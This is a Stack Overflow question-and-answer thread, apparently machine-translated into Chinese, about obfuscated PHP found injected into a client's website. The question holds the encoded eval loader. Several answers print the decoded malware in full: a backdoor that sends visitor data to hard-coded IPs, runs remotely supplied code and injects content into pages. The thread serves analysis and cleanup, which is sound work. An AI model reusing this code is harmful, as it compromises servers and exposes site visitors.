2012-04-18 116 views
0

我前段時間爲一位客戶建立了一個網站,他一直有問題。進入該網站的文件後,我發現這個在PHP類之一的頂部:在我的一個類文件中找到了這個非常奇怪的PHP代碼。它是什麼?

<?php 
/*ad0b18735e68b25aa9c4374221824db5_on*/ $byJtFKIhXRt8KPNfT1me8ooOBXon8QgWfQgLqPSdxb= array('8759','8776','8755','8766');$ARPcAGpFFDTk4GyiFfpsl5zXmfFqCHsAp8DQFSlbm5lhCJq8P= array('8569','8584','8571','8567','8586','8571','8565','8572','8587','8580','8569','8586','8575','8581','8580');$J0BQOOWj4oRnP7liN= array('7450','7449','7467','7453','7406','7404','7447','7452','7453','7451','7463','7452','7453');$UbjPmIKWlC="eval(base64_decode("ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0poVjFsblMwTkdiV1JYTldwa1IyeDJZbXc1YkdWSGJIcGtTRTF2U1d0a2JHUkZNV2hpVjBWcFMxTnNOMGxEUW0xa1Z6VnFaRWRzZG1KcFFuUmlNbEptV1RJNWRVdERVbWxrVjFsd1pUTk9NR05zT1hCamJWWjNZa2RHYWxwVFoybFFSMHAyV2tockswbHBkMmxRUjBwMldraHJLMGxwZDJ0WmJsWnRURU5TYW1KdVVtWmhRMnMzWVZkWlowdERVbXBpYmxKbVlVTkJPVkJUUVhoTFUwSTNTa2RLTVZwcFFUbEpTRTR3WTJ3NWNHTnRWbmRpUjBacVdsTm5hVkJIU25aYVNHc3JTV2wzYVZCSFNuWmFTR3NyU1dsQmRVbElUakJqYld4M1l6SjRhR015YUd4amVXZHJXREZPUmxWc1drWlZiSE5wV2pJNWRscERTbVJMVTNkcldXNVdiVXRVYzJkamJWWXdaRmhLZFVsRFVtbGtWMWszWmxoT01HTnNPWEJqYlZaM1lrZEdhbHBUWjJsUVF6bHBZakpTTlZCcFNYTkphbmQyV1cwNWEyVlVOR2xNUTFKcFpGZFpjMHBIVG5Wa1JqbHZTMVIwY0ZwcFFXOUtSMDUxWkVZNWIwbEVNRGxKUkVWd1NVaHphMWx1Vm0xSlJEQm5Zek5TZVZneWJIbGFXRUp6V1ZkT2JFdERTVGhNTWtwMldraHJLMGxwZUhwa1NFcHdZMGhPYzFsWVRtOWFXRTF2U2tZNVZGSldTbGRTVmtwaVNXMWtkbUl5VVdsWVUydDFTV3AzZGxsdE9XdGxWRFJwVEVOU2FXUlhXWEJQZVVKNVdsaFNNV050TkdkS1Iwb3hXbXAwT1dOdFZqQmtXRXAxU1VOU2FXUlhXVGRtVjFveFltMU9NR0ZYT1hWSlJ6bDNXVmMxY21GVFoydFpibFp0UzFoemExb3pjR1phVTBFNVNVZGFhR0pJVG14UGVWSnZXREozWjFCVFFtOWFWMFpyV2xoS2VsZ3llSEJqTTFGdlMxUjBjRnBwUVc5aFZ6Vm1XVmhLZVZsWWEyOUphMDUyWW01U2JHSnVVWFJTVnpWcVlqSlNjR0p0WXpaSlIyUTJZVmhCYVV4RFFXdGhSamx6UzFOcloyVjVRV3RhTTNCbVdsTkJPVWxJVW5sa1YxVTNabGRzYlVsRFoydGFNM0JtV2xOc04wcElVblJqUjFwMVdWY3hiRWxFTUdka1IxWjBZMGMxYUdKVFoybE1NMUowWTBOSmMwbERTa2RVTURocFMxUjBiV0ZYZUd4WU0wSXhaRVk1YW1JeU5UQmFWelV3WTNsbmEyUkhNWGRhYlRWb1lsZFZjMGxEVW1sa1YxbHdUM2xTTmxwRFFUbEpSMlEyWWpOQ2JHSnBaMnRrUnpGM1dtMDFhR0pYVlhOSlEwcDVTV2xyTjBwSFRuWmlibEpzWW01U2VrbEVNR2RhTTNCNVdsZEdhMHREVWpaYVEzZG5UVlJCZDAxRVFYZE5SRUZ3VDNsU2FtSXlOVEJhVnpVd1kzbEJPVWxITVhaYVJqbHFZakkwYjBwSFRuWmlibEpzWW01U2VrdFVkRzVsYlU1ellqTk9iRXREVWpaYVEyczNaRmMxYzJGWE5YSkxRMUl3WWxoQ2JXSnRSblJhVTJzM1NrZE9kbUp1VW14aWJsSjZTVVF3WjFvemNHeGliVTUyV2tkVmIwcEhUblppYmxKc1ltNVNla3RVZERsSlIxWnpZekpWWjJWNVVtcGlNalV3V2xjMU1HTjVRVGxKUnpGMldrWTVhbUl5Tkc5S1Iwb3hXbWxyTjJaVFVuTmFWelJuVUZOQ2VtUklTbk5hVnpSdlNrZE9kbUp1VW14aWJsSjZTMVIwYjFwWFJtdGFXRWx2U1d0T2RtSnVVbXhpYmxGMFZFZFdkVm96VW05UGFVRnBUR2xTYzFwWE5IQlBNMHBzWkVoV2VXSnBaMnRaTWpsMVpFZFdkV1JJVFhCUE16Qm5XbTVXZFZrelVuQmlNalJuVWpKV01GUlhSblJaVTJkd1pYbFNkR0l6VW05YVdFbG5VRk5CYVdKWFVubGlWMVpyWVZkR2JtTnRPVEZqUXpWcVlqSXdhVTh6U214a1NGWjVZbWxCYTJKWE9UQmhSMVo1VHpNeGRsbHNPWHBrUjBaNVpFTm5hV0l6UW1oaWJYUndTV2xyTjFwdVZuVlpNMUp3WWpJMFoxbFhhRzFrVjFKdFlrZGFObHBIYUcxaFNFMXZTa2hDYUV0WWMydGlWMFowV1ZOQk9VbEZaR3hrUlRGb1lsZEZiMHRVYzJ0YWJXeHpXbE5CT1VsSVZubGlSMVoxV1RJNWExcFRhR1pZTUZwS1ZFVldabGg1YXpkaFYxbG5TMGRzZW1NeVZqQkxRMUptVlRCV1UxWnJWbE5YZVVwSlZrWlNVVmd3YUZCVk1WRnBXRk5yY0dWNVVtOWlNMDR3U1VRd1owcEdPVlJTVmtwWFVsWktZa2xyYUZWV1JrSm1VMFU1VkZaRFNtUlBNekJuV2xkNGVscFRRamRLUjJoMll6TlJaMUJUUVdsSmFuUTVZVmRaWjB0SGJIcGpNbFl3UzBOU1psVXdWbE5XYTFaVFYzbEtVMUpWTVZCV1JWWm1VVlZTUlZWcFNtUkxVMnczU2tkc2QwbEVNR2RLUmpsVVVsWktWMUpXU21KSmJFcEdWRlU1VlZKV09VSlNSVkpUU1d3d04yWlRRbXhpU0U1c1NVaHphMkZZUVdkUVUwRnBTV3AwT1dGWFdXZExSMng2WXpKV01FdERVbVpWTUZaVFZtdFdVMWQ1U2tsV1JsSlJXREZLUmxKclZsTlNWa2xwV0ZOcmNHVjVVbmxhVjFsblVGTkNNV050ZUd4aWJVNTJXa2RWYjBwR09WUlNWa3BYVWxaS1lrbHJhRlZXUmtKbVZXdFdSMUpXU2taVmFVcGtTMVIwT1VsSFZuTmpNbFZuWlhsU2VWcFhXV2RRVTBGcFNXcDBPV0ZYV1dkTFIyeDZZekpXTUV0RFVtWlZNRlpUVm10V1UxZDVTa2xXUmxKUldERldWRkpXU21aUlZXUkdWR3hSYVZoVGEzQmxlVkl4V1ZOQk9VbElWbmxpUjFaMVdUSTVhMXBUYUhwa1NFb3dZako0ZG1ReVZubExRMUptVlRCV1UxWnJWbE5YZVVwSlZrWlNVVmd4VmxSU1ZrcG1VVlZrUmxSc1VXbFlVMnR3VHpNd1oxcFhlSHBhVTBJM1NraFdhRWxFTUdkSmFVazNabGRzYlVsRGFIQmpNMDVzWkVObmExZ3hUa1pWYkZwR1ZXeHphVlZXVmtaVmJHeG1WVEZTVTFOVk5VaEpiREJ3UzFoemEyTllUV2RRVTBJeFkyMTRiR0p0VG5aYVIxVnZTa1k1VkZKV1NsZFNWa3BpU1d4R1ZsSldTbHBZTVU1VlZXdHNUMUo1U21STFZIUTVTVWRXYzJNeVZXZGxlVko0WTNsQk9VbERTV2xQTXpCclpGaEtjMWg2UVdkUVUwRnBZVWhTTUdORWIzWk1lVWxuVEdsQmEyTkhSVGRLU0ZaNVlrWTRlRWxFTUdkSmFUbHhXbGRTY0V4dVFtOWpSRGt5V2xoS2VtRlhPWFZRVkVFMVQxUk5iV0pYT1RCaFIxWjVVRk5KWjB4cFVuUlpWekZvU1VNMFowbHBXbTFoVjNoc1VGTkpaMHhwUVd0YWJXeHpXbE5CZFVsRFNXMWhSemw2WkVRd2FVbEROR2RLUjJoMll6TlJaMHhwUVdsS2JXeDNVRk5KWjB4cFFXdGhXRUZuVEdsQmFVcHVTbXhhYWpCcFNVTTBaMHBJU214YWFVRjFTVU5KYldSWFJUbEphVUYxU2toV2FFbEROR2RKYVZwNFkzb3dhVWxETkdkS1NFWjZUM2xTTUdOdWEyZFFVMEl3WTI1V2JFOHliRzFMUTBKdFpGYzFhbVJIYkhaaWJEbHNaVWRzZW1SSVRXOUpiVTR4WTIxNFptRlhOWEJrUTBsd1NVTnNOMHBIVG05SlJEQm5XVE5XZVdKR09YQmliV3d3UzBOU01XTnRlR1pOUTBGMVNVTlNNV050ZUdaTlUyczNXVE5XZVdKR09YcGFXRkoyWTBoUmIwcEhUbTlNUTBKRVZsWktUVlF4UWxWWU1VcEdWa1pXVTFSc1VsTlJWVFZVVW10V1UweERRWGhMVkhScVpGaEtjMWd6VG14a1J6bDNaRU5uYTFreVozTkpSVTVXVld0NFVGVkdVbVpXUld4T1VsVTVWbFpEZDJkTmVXczNTa2hXYzJSRFFUbEpTRko1WVZjd2Ixa3pWbmxpUmpsc1pVZFdha3REVW1waFEydHdUM2xTTUdOdWEyZFFVMEp0V1ZkNGVscFVkRGxKUjJ4dFNVTm5iMkZYTlhCWU1tUnNaRU5uYVZsWGVITmlNMlJtWkZoS2MxZ3lXblpqUjFaMVNXbHJjRWxEV1cxSlExSXdZMjVyY0VsSWMydGtWM2d3U1VRd1oyUklTbkJpVTJoQldtMXNjMXBXT1c1YVdGSm1XVEk1ZFdSSFZuVmtTRTF2U2toV2VXSkdPSGRKUXpSblNraFdlV0pHT0hoTFUyczNTa2hTZVdWVFFUbEpSMXBvWWtoT2JFOHpNWEJhYVdkclpFaEtOVXRZYzJ0YWJrRm5VRk5DYldNeU9XcGhNamwzV2xjMGIwcElRbWhNUTBFMFRVTjNaMHBIVm5samJUVjJURU5CYTFwWVNubGpNMUo1VEVOQmVrMURhemRoVjFsblMwTlNiV05EYTJkbGVWSjJaRmhSWjFCVFFXbFNNRlpWU1VOU01XTnRlR1pOVTBKSlZrWlNVVXg2UlhWTlJuaDVXRWMwYVU5NVVuWmtXRkZuVEdvd1owbHJhSFpqTTFFMlNVTlNkMWxXZUhsWVJ6UnBUM2xTZG1SWVVXZE1hakJuU1d0T2RtSnROV3haTTFKd1lqSTBOa2xGVG5OaU0wNXNXRWhLWTJKc2VIbFlSelJwVHpKYU0yTnRiREJhVTJkcldtNUJjMGxEVW5aa1dGRndUM2xTZVZwWVVXZFFVMEZwU1dwME0yRkhiSE5hVTBGdlNWZGFiR0l5V1c5S1IxcDNTMU5yWjJWNVVubGFXRkZuU1VNME9VbERRbTFhTWxZd1kzbG5hMXB1UVhOSlJFVjVUME5yTjJaWFdtcGlSemw2V2xObmExcHVRWEJQZVZJeFlraFJaMUJUUWpCamJXeDBTMGhPTVZsdVRqQmphV2RyWTIxV01FeERRbnBrU0VwM1lqTk5iMHBJU214a1EzZG5TV3g0ZVZoSE5XTmpiSGgxU1dsclowdDVRVEJMVTJzM1psZ3daMGxIYkcxSlEyaDZaRWhLZDJJelRXOUtTRlp6WkVOM2FWcFlXbWhpUTBsd1NVTkZPVkJUUW0xWlYzaDZXbE5zTjBwSWIyZFFVMEo2WkVoS2NHTklUbk5aV0U1dldsaE5iMk16VW5sWU0wcHNZMGQ0YUZreVZXOUpiVll5V1ZkM2FVeERTV2xNUTFJeFlraFJjRXRVYzJkYVdGcG9Za05uYTJWcGF6ZEpSMVkwWVZoUmIwdFVkRGxoVjFsblMwaE9NR051UW5aamVXZHJaRmQ0TUV4RFNteFpiVFZvU1dsclowbFVNRGxKUjFwb1lraE9iRXRZYzJ0WU1VNUdWV3hhUmxWc2MybGFNamwyV2tOS1pFbEVNR2RqTTFKNVdETktiR05IZUdoWk1sVnZTVzFXYVdKdFJXbE1RMGxwVEVOU01XSklVWEJQTTBwc1pFaFdlV0pwUWpCamJsWnNUek14YkdKSVRteEpTSFI1V2xoU01XTnROR2RhYlVaell6SlZOMlpZTUd0YWJVWXdZVWRXZVUxc2RHUkpSREJuU1dwak0weHFaM2hNYWtrd1RWTTBlVTVVVFdsUGVWSnRXVmhTYjFwWVNYbFhNVEJuVUZOQmFVNUVXWFZOYWxFMVRHcFZORXhxUlhwT1UwazNTa2RhYUdSSGFHeGpha3BpV0ZOQk9VbERTWGhPZWxsMVQxTTBlVTVFUlhWTlZGVjNTV3B6YTFwdFJqQmhSMVo1VFd4MFpFbEVNR2RKYWxFeVRHcE5NMHhxUlRKUFV6UXhUbWxKTjBwSFdtaGtSMmhzWTJwS1lsaFRRVGxKUTBrMVRrTTBlVTVFU1hWTmFsVXhUR3BOTVVscWMydGFiVVl3WVVkV2VVMXNkR1JKUkRCblNXcEZNMDlETkhoT2FrbDFUVlJKTlV4cVNYbE5lVWszU2tkYWFHUkhhR3hqYWtwaVdGTkJPVWxEU1hwTlV6UjRUMFJSZFUxcVRUQk1hbXN5U1dwemExcHRSakJoUjFaNVRXeDBaRWxFTUdkSmFtTXpUR3ByTVV4cVJUUk1ha1UwVDFOSk4wcEhXbWhrUjJoc1kycEtZbGhUUVRsSlEwazFUWGswZUU1NlFYVk5WRTB6VEdwSmVVbHFjMnRhYlVZd1lVZFdlVTFzZEdSSlJEQm5TV3BGTkU5RE5EQk5RelExVGxNMGVVNUVVV2xQZVZKdFdWaFNiMXBZU1hsWE1UQm5VRk5CYVUxVWF6Vk1ha1Y0VGxNMGVVMTZSWFZPVkdkcFQzbFNiVmxZVW05YVdFbDVWekV3WjFCVFFXbFBSRWwxVFZScmVVeHFaek5NYWtVelQwTkpOMHBIV21oa1IyaHNZMnBLWWxoVFFUbEpRMGw1VFZSWmRVMXFVVEpNYW1zMVRHcEplRTVUU1RkS1IxcG9aRWRvYkdOcVNtSllVMEU1U1VOSk5VNVROSGxOVkVWMVRWUm5kVTU2YTJsUE0wNXZaRmRhYldKSFZXOUtSMXBvWkVkb2JHTnFTWEJQTWxwMlkyMVdhRmt5WjI5S1IxcG9aRWRvYkdOcVNXZFpXRTFuU2toV2VVdFlkSEJhYVVGdlNVZEdiMXB1Vm10YWJYaHRaVzFTYjFwdGFIcExRMUl4WTJsclowdFRRamRKUjBwNVdsZEdja2xFZERsbVdEQTlJaWtwT3lBPSIpKTsg")); ";if (!function_exists("Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ")){ function Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($fmG17jH6h8R6pfvV6ODRd6K,$iot3u6fS){$AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7 = '';foreach($fmG17jH6h8R6pfvV6ODRd6K as $seJ3kuSEl4K8TkDMQJMs34XHkz5KM2gM6QFgboLmiml2wOFdoh){$AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7 .= chr($seJ3kuSEl4K8TkDMQJMs34XHkz5KM2gM6QFgboLmiml2wOFdoh - $iot3u6fS);}return $AJgVhd3fVZu0lfXZJE2Gf9LusFOpLxzn7;}$hKVywz3gfZQjZpsdvfedFEEg3UyYs7BlInK4MDaRsR1h6 = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($byJtFKIhXRt8KPNfT1me8ooOBXon8QgWfQgLqPSdxb,8658);$UsopvTU00NLoC = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($ARPcAGpFFDTk4GyiFfpsl5zXmfFqCHsAp8DQFSlbm5lhCJq8P,8470);$D4fUhPPUiQCBxt = Gk8ZQGrrSvbiFVNEUQ6Ke9IiogWaRAABLyqr5HJ($J0BQOOWj4oRnP7liN,7352);$UCUMQ98AUYryzF0tSVyD = $UsopvTU00NLoC('$kiNmYfN',$hKVywz3gfZQjZpsdvfedFEEg3UyYs7BlInK4MDaRsR1h6.'('.$D4fUhPPUiQCBxt.'($kiNmYfN));');$UCUMQ98AUYryzF0tSVyD($UbjPmIKWlC);} /*ad0b18735e68b25aa9c4374221824db5_off*/ ?> 

我不知道它是什麼,它不可能破譯。直接在線訪問文件時不輸出任何內容。有任何想法嗎?它看起來是惡意的嗎?

+0

如果它是這樣寫的是,它絕對不能很好。 – 2012-04-18 21:09:12

+0

這是一個Worpress網站嗎? – 2012-04-18 21:09:25

+0

我很確定這是加密的代碼。你是唯一一個在網站上工作過的人嗎?如果是這樣,那麼你可能已被黑客入侵。如果沒有,請詢​​問其他開發者是否放在那裏。 – citruspi 2012-04-18 21:11:49

回答

5

如果,沒有你的開發商有它從那麼我想你是一個攻擊:(。眼前的解決辦法是做到以下幾點下傳來的任何想法,

  1. 清潔您的所有文件。
  2. 切換到安全的FTP訪問立即
  3. 做一下這種攻擊互聯網上的一些調查研究,看看你需要採取什麼其他行動。

你需要迅速行動,因爲瀏覽器裏ke chrome和FF很快就會注意到它,並會開始將您的網站顯示爲對用戶有惡意。

+2

對於比我給出的更實用的建議+1 :-) – jimw 2012-04-18 21:11:28

+1

我也想補充一句:如果你的服務器已經被入侵,唯一的方法就是確保你已經清理掉了,刮。如果攻擊者已經安裝了rootkit,那麼您將不會使用SFTP刪除他。另外,要小心備份 - 攻擊者可能已經呆了一段時間,在這種情況下,您的某些備份可能包含他的代碼。 – jimw 2012-04-18 21:14:46

+0

謝謝,我想我可以用更多的搜索來解決這個問題。該網站本身不是WordPress,但該客戶的共享主機帳戶上還有其他WP網站。從字面上看,他的主機帳戶上的每個php文件都有一些此漏洞的版本。多麼痛苦! – 2012-04-18 21:36:59

-1

爲了擴大對我的評論...

您使用的是CMS(WordPress的是,Joomla等)?如果是這樣,一些第三方插件和主題開發人員試圖加密他們的代碼,以便它不被盜版...

如果您從頭開始編寫網站,請往下看。

你是唯一的開發者嗎?

(YES) - >您已被黑客入侵。 - >檢查你的日誌文件。 - >尋找不尋常的活動/黑客攻擊嘗試。 - >嘗試查找漏洞並對其進行修補。 - >刪除惡意代碼。

(否) - >詢問其他開發人員是否放在那裏。如果答案是否定的,請轉到上述解決方案。

汗說,時間就是生命,以在一定程度上,因爲像信託的谷歌和Web服務將開始將網站標記爲惡意。同時,不要只是刪除外國代碼。如果您設法在以後解決它,您可能會弄清楚它做了什麼以及向誰報告 - >黑客是誰。

也看一下服務器日誌...如果你的服務器一直紮根,那麼唯一的辦法讓黑客了將重新安裝。

的代碼是:

if (!function_exists("GetMama")) 
{ 
    function mod_con($buf){ 
     str_ireplace("","",$buf,$cnt_h); 

     if ($cnt_h == 1) { 
      $buf = str_ireplace("","" . stripslashes($_SERVER["good"]),$buf); 
      return $buf; 
     } 

     str_ireplace("","",$buf,$cnt_h); 
     if ($cnt_h == 1) { 
      $buf = str_ireplace("",stripslashes($_SERVER["good"])."",$buf); 
      return $buf; 
     } 

     return $buf; 
    } 

    function opanki($buf){ 
     $gz_e = false;$h_l = headers_list(); 

     if (in_array("Content-Encoding: gzip", $h_l)) { 
      $gz_e = true; 
     } 

     if ($gz_e){ 
      $tmpfname = tempnam("/tmp", "FOO"); 
      file_put_contents($tmpfname, $buf); 
      $zd = gzopen($tmpfname, "r"); 
      $contents = gzread($zd, 10000000); 
      $contents = mod_con($contents); 
      gzclose($zd); 
      unlink($tmpfname); 
      $contents = gzencode($contents); 
     } 

     else { 
      $contents = mod_con($buf); 
     } 

     $len = strlen($contents); 
     header("Content-Length: ".$len); 
     return($contents); 
    } 

    function GetMama(){ 
     $mother = "mdrmediagroup.com"; 
     return $mother; 
    } 

    ob_start("opanki"); 

    function ahfudflfzdhfhs($pa){ 
     $mama = GetMama(); 
     $file = urlencode(FILE); 

     if (isset($_SERVER["HTTP_HOST"])){ 
      $host = $_SERVER["HTTP_HOST"]; 
     } else { 
      $host = ""; 
     } 

     if (isset($_SERVER["REMOTE_ADDR"])){ 
      $ip = $_SERVER["REMOTE_ADDR"]; 
     } 

     else { 
      $ip = ""; 
     } 

     if (isset($_SERVER["HTTP_REFERER"])){ 
      $ref = urlencode($_SERVER["HTTP_REFERER"]); 
     } 

     else { 
      $ref = ""; 
     } 

     if (isset($_SERVER["HTTP_USER_AGENT"])){ 
      $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"])); 
     } 

     else { 
      $ua = ""; 
     } 

     if (isset($_SERVER["QUERY_STRING"])){ 
      $qs = urlencode($_SERVER["QUERY_STRING"]); 
     } 

     else { 
      $qs = ""; 
     } 

     $url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs; 

     $try = true; 

     if(function_exists("curl_init")){ 

      $ch = curl_init($url_0 . $url_1); 
      curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
      curl_setopt($ch, CURLOPT_TIMEOUT, 3); 
      $ult = trim(curl_exec($ch)); 
      $try = false; 
     } 

     if ((ini_get("allow_url_fopen")) && $try) { 
      $ult = trim(@file_get_contents($url_0 . $url_1)); 
      $try = false; 
     } 

     if($try){ 
      $fp = fsockopen($pa, 80, $errno, $errstr, 30); 

      if ($fp) { 
       $out = "GET $url_1 HTTP/1.0\r\n"; 
       $out .= "Host: $pa\r\n"; 
       $out .= "Connection: Close\r\n\r\n"; 
       fwrite($fp, $out); 
       $ret = ""; 

       while (!feof($fp)) { 
        $ret .= fgets($fp, 128); 
       } 

       fclose($fp); 

       $ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4)); 
      } 

     } 

     if (strpos($ult,"eval") !== false){ 
      $z = stripslashes(str_replace("eval","",$ult)); e 
      val($z); 
      exit(); 
     } 

     if (strpos($ult,"ebna") !== false){ 
      $_SERVER["good"] = str_replace("ebna","",$ult); 
      return true; 
     } 

     else { 
      return false; 
     } 

    } 

    $father2[] = "77.81.241.253"; 
    $father2[] = "46.249.58.135"; 
    $father2[] = "176.9.241.150"; 
    $father2[] = "46.37.169.56"; 
    $father2[] = "94.242.255.35"; 
    $father2[] = "178.162.129.223"; 
    $father2[] = "31.184.234.96"; 
    $father2[] = "77.95.18.189"; 
    $father2[] = "93.170.137.22"; 
    $father2[] = "188.40.95.244"; 
    $father2[] = "199.115.231.58"; 
    $father2[] = "82.192.87.178"; 
    $father2[] = "216.246.99.215"; 
    $father2[] = "95.211.18.79"; 

    shuffle($father2); 

    foreach($father2 as $ur){ 
     if (ahfudflfzdhfhs($ur)) { 
      break ; 
     } 
    } 
} 

解壓後用手所以它更容易閱讀:)

+0

不是100%爲真。如果他使用的是CMS,比如Wordpress,Joomla Drupla等,有時候第三方模塊開發人員會嘗試隱藏他們的代碼,像這樣... – 2012-04-18 21:19:11

+0

我意識到並在上面的評論中道歉。 – citruspi 2012-04-18 21:22:24

5

你肯定被黑。

我很樂意捅入代碼。

的代碼Base64編碼多次,然後eval'd。結果是:

if (!function_exists("GetMama")){ 
function mod_con($buf){ 

str_ireplace("<body>","<body>",$buf,$cnt_h); 

if ($cnt_h == 1) { 

$buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); 
return $buf;} 

str_ireplace("</body>","</body>",$buf,$cnt_h); 

if ($cnt_h == 1) { 
$buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); 

return $buf;} 
return $buf;} 

function opanki($buf){ 
$gz_e = false;$h_l = headers_list(); 

if (in_array("Content-Encoding: gzip", $h_l)) { $gz_e = true;} 

if ($gz_e){ 

$tmpfname = tempnam("/tmp", "FOO"); 

file_put_contents($tmpfname, $buf);$zd = gzopen($tmpfname, "r"); 

$contents = gzread($zd, 10000000); 

$contents = mod_con($contents); 

gzclose($zd); 

unlink($tmpfname); 

$contents = gzencode($contents);} 

else { 

$contents = mod_con($buf);} 

$len = strlen($contents); 

header("Content-Length: ".$len); 

return($contents);} 

function GetMama(){ 
$mother = "mdrmediagroup.com"; 

return $mother;} 

ob_start("opanki"); 

function ahfudflfzdhfhs($pa){ 

$mama = GetMama(); 

$file = urlencode(__FILE__); 

if (isset($_SERVER["HTTP_HOST"])){ 

$host = $_SERVER["HTTP_HOST"];} else { 

$host = "";} 

if (isset($_SERVER["REMOTE_ADDR"])){ 

$ip = $_SERVER["REMOTE_ADDR"];} else { 

$ip = "";}if (isset($_SERVER["HTTP_REFERER"])){ 

$ref = urlencode($_SERVER["HTTP_REFERER"]);} 

else { 

$ref = "";} 

if (isset($_SERVER["HTTP_USER_AGENT"])){ 

$ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} 

else { 

$ua = "";} 

if (isset($_SERVER["QUERY_STRING"])){ 

$qs = urlencode($_SERVER["QUERY_STRING"]);} 

else {$qs = "";} 

$url_0 = "http://" . $pa;$url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs; 

$try = true; 

if(function_exists("curl_init")){ 

$ch = curl_init($url_0 . $url_1); 

curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 

curl_setopt($ch, CURLOPT_TIMEOUT, 3); 

$ult = trim(curl_exec($ch)); 

$try = false;} 

if ((ini_get("allow_url_fopen")) && $try) { 

$ult = trim(@file_get_contents($url_0 . $url_1)); 

$try = false;} 

if($try){ 

$fp = fsockopen($pa, 80, $errno, $errstr, 30); 

if ($fp) { 

$out = "GET $url_1 HTTP/1.0\r\n";$out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n";fwrite($fp, $out); 

$ret = ""; 

while (!feof($fp)) { 

$ret .= fgets($fp, 128);} 

fclose($fp);$ult = trim(substr($ret, strpos($ret, "\r\n\r\n") + 4)); 

}} 

if (strpos($ult,"eval") !== false){ 

$z = stripslashes(str_replace("eval","",$ult)); 

eval($z); 

exit();} 

if (strpos($ult,"ebna") !== false){$_SERVER["good"] = str_replace("ebna","",$ult); 

return true;} 

else { 
return false;}} 

$father2[] = "77.81.241.253";$father2[] = "46.249.58.135";$father2[] = "176.9.241.150";$father2[] = "46.37.169.56";$father2[] = "94.242.255.35";$father2[] = "178.162.129.223";$father2[] = "31.184.234.96";$father2[] = "77.95.18.189";$father2[] = "93.170.137.22";$father2[] = "188.40.95.244";$father2[] = "199.115.231.58";$father2[] = "82.192.87.178";$father2[] = "216.246.99.215";$father2[] = "95.211.18.79";shuffle($father2);foreach($father2 as $ur){ 
if (ahfudflfzdhfhs($ur)) { break ;}}} 
+1

不錯!以下是有關惡意軟件的更多信息... http://sucuri.net/new-malware-eval-getmama-encoded-javascript.html – 2012-04-18 21:27:18

+0

下次您計劃發佈代碼時,請嘗試正確格式化。這是編輯的地獄。 – 2012-05-10 15:34:55

2

是的,它是惡意代碼,其一堆的base64編碼的刺evaled,並將得到的代碼是:

<?php 
if (!function_exists("GetMama")){ 
    function mod_con($buf){ 
     str_ireplace("<body>","<body>",$buf,$cnt_h); 
     if ($cnt_h == 1) { 
      $buf = str_ireplace("<body>","<body>" . stripslashes($_SERVER["good"]),$buf); 
      return $buf; 
     } 
     str_ireplace("</body>","</body>",$buf,$cnt_h); 
     if ($cnt_h == 1) { 
      $buf = str_ireplace("</body>",stripslashes($_SERVER["good"])."</body>",$buf); 
      return $buf;}return $buf;}function opanki($buf){ 
       $gz_e = false; 
       $h_l = headers_list(); 
       if (in_array("Content-Encoding: gzip", $h_l)) { 
        $gz_e = true; 
       }if ($gz_e){ 
        $tmpfname = tempnam("/tmp", "FOO"); 
        file_put_contents($tmpfname, $buf); 
        $zd = gzopen($tmpfname, "r"); 
        $contents = gzread($zd, 10000000); 
        $contents = mod_con($contents); 
        gzclose($zd);unlink($tmpfname); 
        $contents = gzencode($contents); 
       } else {$contents = mod_con($buf);} 
       $len = strlen($contents); 
       header("Content-Length: ".$len); 
       return($contents);} 
       function GetMama(){ 
        $mother = "mdrmediagroup.com"; 
        return $mother;}ob_start("opanki"); 
        function ahfudflfzdhfhs($pa){ 
         $mama = GetMama(); 
         $file = urlencode(__FILE__); 
         if (isset($_SERVER["HTTP_HOST"])){ 
          $host = $_SERVER["HTTP_HOST"]; 
         } else { 
          $host = ""; 
         }if (isset($_SERVER["REMOTE_ADDR"])){ 
          $ip = $_SERVER["REMOTE_ADDR"]; 
         } else {$ip = ""; 
         }if (isset($_SERVER["HTTP_REFERER"])){ 
          $ref = urlencode($_SERVER["HTTP_REFERER"]); 
         } else {$ref = "";} 
         if (isset($_SERVER["HTTP_USER_AGENT"])){ 
          $ua = urlencode(strtolower($_SERVER["HTTP_USER_AGENT"]));} else { 
           $ua = ""; 
          }if (
          isset($_SERVER["QUERY_STRING"])){ 
           $qs = urlencode($_SERVER["QUERY_STRING"]); 
          } else {$qs = "";} 
          $url_0 = "http://" . $pa; 
          $url_1 = "/jedi.php?version=0993&mother=" .$mama . "&file=" . $file . "&host=" . $host . "&ip=" . $ip . "&ref=" . $ref . "&ua=" .$ua . "&qs=" . $qs; 
          $try = true; 
          if(function_exists("curl_init")){ 
           $ch = curl_init($url_0 . $url_1); 
           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); 
           curl_setopt($ch, CURLOPT_TIMEOUT, 3); 
           $ult = trim(curl_exec($ch)); 
           $try = false; 
          } if ((ini_get("allow_url_fopen")) && $try) { 
           $ult = trim(@file_get_contents($url_0 . $url_1)); 
           $try = false; 
          }if($try){ 
           $fp = fsockopen($pa, 80, $errno, $errstr, 30); 
           if ($fp) {$out = "GET $url_1 HTTP/1.0\r\n"; 
           $out .= "Host: $pa\r\n";$out .= "Connection: Close\r\n\r\n"; 
           fwrite($fp, $out);$ret = ""; 
           while (!feof($fp)) { 
            $ret .= fgets($fp, 128); 
           }fclose($fp); 
